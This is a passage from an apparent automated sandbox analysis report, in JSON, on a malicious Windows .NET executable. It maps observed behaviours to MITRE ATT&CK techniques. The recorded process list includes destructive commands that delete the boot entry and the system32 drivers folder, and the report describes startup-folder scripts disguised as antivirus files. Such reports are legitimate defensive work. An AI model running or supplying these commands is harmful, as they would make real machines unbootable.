\"HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\"; Key: \"\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\109F1CAED645BB78B3EA2B94C0697C740733031C\"; Key: \"BLOB\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "certificate-0", "type": 17, "relevance": 10, "name": "The input sample is signed with a certificate", "description": "The input sample is signed with a certificate issued by \"CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O=\"GoDaddy.com\n Inc.\", L=Scottsdale, ST=Arizona, C=US\" (SHA1: 47:F9:77:BB:69:BA:4B:44:A5:77:26:F5:CD:9C:0A:9A:07:B0:77:44; see report for more information)\n The input sample is signed with a certificate issued by \"CN=Go Daddy Root Certificate Authority - G2, O=\"GoDaddy.com\n Inc.\", L=Scottsdale, ST=Arizona, C=US\" (SHA1: 27:AC:93:69:FA:F2:52:07:BB:26:27:CE:FA:CC:BE:4E:F9:C3:19:B8; see report for more information)\n The input sample is signed with a certificate issued by \"OU=Go Daddy Class 2 Certification Authority, O=\"The Go Daddy Group\n Inc.\", C=US\" (SHA1: 34:0B:28:80:F4:46:FC:C0:4E:59:ED:33:F5:2B:3D:08:D6:24:29:64; see report for more information)\n The input sample is signed with a certificate issued by \"OU=Go Daddy Class 2 Certification Authority, O=\"The Go Daddy Group\n Inc.\", C=US\" (SHA1: 27:96:BA:E6:3F:18:01:E2:77:26:1B:A0:D7:77:70:02:8F:20:EE:E4; see report for more information)\n The input sample is signed with a certificate issued by \"CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O=\"GoDaddy.com\n Inc.\", L=Scottsdale, ST=Arizona, C=US\" (SHA1: A6:64:9E:2D:CD:D4:5A:90:6C:88:B1:DF:B8:C7:E7:B8:5F:03:8B:73; see report for more information)\n The input sample is signed with a certificate issued by \"CN=DigiCert Global G2 TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US\" (SHA1: 97:D8:C5:70:0F:12:24:6C:88:BC:FA:06:7E:8C:A7:4D:A8:62:67:28; see report for more information)\n The input sample is signed with a certificate issued by \"CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US\" (SHA1: 1B:51:1A:BE:AD:59:C6:CE:20:70:77:C0:BF:0E:00:43:B1:38:26:12; see report for more information)\n The input sample is signed with a certificate issued by \"CN=R10, O=Let's Encrypt, C=US\" (SHA1: 06:1D:18:D6:F5:10:B0:6D:B1:F4:F2:9C:42:21:64:39:96:0C:AA:BF; see report for more information)\n The input sample is signed with a certificate issued by \"CN=ISRG Root X1, O=Internet Security Research Group, C=US\" (SHA1: 00:AB:EF:D0:55:F9:A9:C7:84:FF:DE:AB:D1:DC:DD:8F:ED:74:14:36; see report for more information)", "origin": "Certificate Data", "attck_id": "T1553.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 768B0000\n \"WScript.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 768B0000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 768B0000\n \"bcdedit.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 768B0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-2", "type": 9, "name": "An application crash occurred", "description": "Report process \"WerFault.exe\" was created by \"svchost.exe\"\n Report process \"WerFault.exe\" was created by \"CompatTelRunner.exe\"", "origin": "Monitored Target"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-7", "type": 10, "name": "Loads the CLR Loader DLL", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 641F0000\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" loaded module \"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" at 649A0000", "origin": "Loaded Module", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"xlsrvintl.dll\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"DISMHOST.EXE.67AB3F4E.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3\" file has an entrypoint instructions - \"jmp\tdword ptr [0x402000],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"\n \"xlsrvintl.dll\" file has an entrypoint instructions - \"jmp\tdword ptr [0x402000],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"\n \"DISMHOST.EXE.67AB3F4E.bin\" file has an entrypoint instructions - \"call\t0x100a7e6,jmp\t0x10097f4,int3\t,int3\t,int3\t,int3\t,int3\t,push\t0x14,push\t0x1010878,call\t0x1009d10,and\tdword ptr [ebp - 4], 0,dec\tdword ptr [ebp + 0x10],js\t0x1009afc,mov\tecx, dword ptr [ebp + 8],sub\tecx, dword ptr [ebp + 0xc],mov\tdword ptr [ebp + 8], ecx,call\tdword ptr [ebp + 0x14],jmp\t0x1009abc,mov\teax, dword ptr [ebp - 0x14],mov\tdword ptr [ebp - 0x1c], eax,mov\teax, dword ptr [ebp - 0x1c],mov\teax, dword ptr [eax],mov\tdword ptr [ebp - 0x20], eax,mov\teax, dword ptr [ebp - 0x20],cmp\tdword ptr [eax], 0xe06d7363,je\t0x1009af3,mov\tdword ptr [ebp - 0x24], 0,mov\teax, dword ptr [ebp - 0x24],ret\t,call\tdword ptr [0x1001210],mov\tesp, dword ptr [ebp - 0x18],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:443\"\n \"<IPv4>:443\"\n \"<IPv4>:443\"\n \"<IPv4>:443\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-144", "relevance": 1, "name": "PE file contains COM data directory", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3\" has COM data directory \"IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR\"\n \"xlsrvintl.dll\" has COM data directory \"IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"archive.org\"\n \"ia800905.us.archive.org\"\n \"raw.githubusercontent.com\"\n \"vgmsite.com\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-138", "relevance": 1, "name": "Dotnet code contains ability to query registry", "description": "Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"OpenSubKey\" in \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"OpenSubKey\" in \"xlsrvintl.dll\"", "origin": "Static Parser", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3\" has an executable section named \".text\"\n \"xlsrvintl.dll\" has an executable section named \".text\"\n \"DISMHOST.EXE.67AB3F4E.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"xlsrvintl.dll\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"DISMHOST.EXE.67AB3F4E.bin\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"DISMHOST.EXE.67AB3F4E.bin\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"WScript.exe\" with commandline \"\"%APPDATA%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\A ...\" (UID: 00000000-00001988), Spawned process \"cmd.exe\" with commandline \"/c \"\"%APPDATA%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startu ...\" (UID: 00000000-00005672), Spawned process \"bcdedit.exe\" with commandline \"bcdedit /delete {current}\" (UID: 00000000-00005764), Spawned process \"cmd.exe\" with commandline \"cmd /c rd %WINDIR%\\\\system32\\\\drivers/s/q\" (UID: 00000000-00005948)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"WScript.exe\" with commandline \"\"%APPDATA%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\A ...\" (UID: 00000000-00001988), Spawned process \"cmd.exe\" with commandline \"/c \"\"%APPDATA%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startu ...\" (UID: 00000000-00005672), Spawned process \"bcdedit.exe\" with commandline \"bcdedit /delete {current}\" (UID: 00000000-00005764), Spawned process \"cmd.exe\" with commandline \"cmd /c rd %WINDIR%\\\\system32\\\\drivers/s/q\" (UID: 00000000-00005948)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-220", "type": 9, "relevance": 3, "name": "Executes batch file", "description": "Process \"cmd.exe\" with commandline \"/c \"\"%APPDATA%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\Antivirus.bat\" \"\" (UID: 00000000-00005672)", "origin": "Monitored Target", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3\" was detected as \"temporary EXE SFX\" and name: \"sfx\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3\" was detected as \".NET\" and name: \"Library\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"xlsrvintl.dll\" was detected as \"temporary EXE SFX\" and name: \"sfx\"\n \"xlsrvintl.dll\" was detected as \".NET\" and name: \"Library\"\n \"xlsrvintl.dll\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"DISMHOST.EXE.67AB3F4E.bin\" was detected as \"temporary EXE SFX\" and name: \"sfx\"\n \"DISMHOST.EXE.67AB3F4E.bin\" was detected as \".NET\" and name: \"Library\"\n \"DISMHOST.EXE.67AB3F4E.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3\" has flags like IMAGE_DLLCHARACTERISTICS_NO_SEH\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n \"xlsrvintl.dll\" has flags like IMAGE_DLLCHARACTERISTICS_NO_SEH\n IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT\n \"DISMHOST.EXE.67AB3F4E.bin\" has flags like IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-139", "relevance": 1, "name": "Dotnet code contains ability to modify/delete registry", "description": "Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"SetValue\" in \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"CreateSubKey\" in \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"SetValue\" in \"xlsrvintl.dll\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"CreateSubKey\" in \"xlsrvintl.dll\"", "origin": "Static Parser", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3\" was detected as \"Microsoft visual C# v7.0 / Basic .NET\"\n \"xlsrvintl.dll\" was detected as \"Microsoft visual C# v7.0 / Basic .NET\"\n \"DISMHOST.EXE.67AB3F4E.bin\" was detected as \"Visual C++ 2005 Release -> Microsoft\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"YourMom.vbs\" - Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\YourMom.vbs]- [targetUID: 00000000-00005752]\n Dropped file: \"Antivirus3.vbs\" - Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus3.vbs]- [targetUID: 00000000-00005752]\n Dropped file: \"KasperskyScanner.hta\" - Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\KasperskyScanner.hta]- [targetUID: 00000000-00005752]\n Dropped file: \"YourMomIsGay.html\" - Location: [%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\YourMomIsGay.html]- [targetUID: 00000000-00005752]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-2.dll\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-0.dll\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\VCRUNTIME140_CLR0400.dll\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ucrtbase_clr0400.dll\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-quirks-l1-1-0.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" reads file \"c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll.aux\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\system.windows.forms.ni.dll.aux\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\0b2f69b43a576b9edcc807a30872bd91\\system.ni.dll.aux\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\2c3c912ea8f058f9d04c4650128feb3f\\system.ni.dll.aux\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\system.drawing.ni.dll.aux\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" reads file \"c:\\946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\96f7edb07b12303f0ec2595c7f3778c7\\system.configuration.ni.dll.aux\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\31fae3290fad30c31c98651462d22724\\system.core.ni.dll.aux\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" reads file \"c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\15af16d373cf0528cb74fc73d365fdbf\\system.xml.ni.dll.aux\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to access non-existent file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to access non-existent file \"C:\\946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe.config\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\fusion.localgac\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Nominatus_T7fc20cc6#\\\"\n \"946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe\" trying to access non-existent file \"C:\\946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.INI\"\n 